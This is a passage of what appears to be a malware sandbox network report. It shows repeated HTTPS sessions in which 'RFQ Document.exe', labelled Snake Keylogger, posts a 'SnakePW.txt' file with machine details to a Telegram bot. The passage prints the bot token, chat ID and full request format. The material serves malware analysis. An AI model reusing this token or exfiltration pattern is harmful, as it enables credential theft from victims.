{"ok":true,"result":{"message_id":12617,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808708,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49813	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:29 UTC	59	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c6c35844 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:29 UTC	59	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 63 33 35 38 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c6c35844Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:29 UTC	59	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:29 UTC	60	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12618,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49814	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:29 UTC	60	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c6e97fa6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:29 UTC	60	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 65 39 37 66 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c6e97fa6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:29 UTC	61	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:29 UTC	61	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12619,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49815	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:29 UTC	62	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c71df22a Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:29 UTC	62	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 31 64 66 32 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c71df22aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:29 UTC	62	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:29 UTC	63	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12620,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49778	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:21 UTC	6	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c25218b6 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:21 UTC	6	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 35 32 31 38 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c25218b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:21 UTC	6	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:21 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:21 UTC	7	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12583,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49816	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:29 UTC	63	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c73cf0fb Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:29 UTC	64	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 33 63 66 30 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c73cf0fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:29 UTC	64	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:29 UTC	64	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12621,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49817	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:30 UTC	65	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c75bef09 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:30 UTC	65	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 35 62 65 66 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c75bef09Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:30 UTC	66	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:30 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:30 UTC	66	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12622,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49818	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:30 UTC	67	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c7906228 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:30 UTC	67	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 39 30 36 32 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c7906228Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:30 UTC	67	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:30 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:30 UTC	68	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12623,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49819	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:30 UTC	68	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c7af6092 Host: api.telegram.org Content-Length: 407
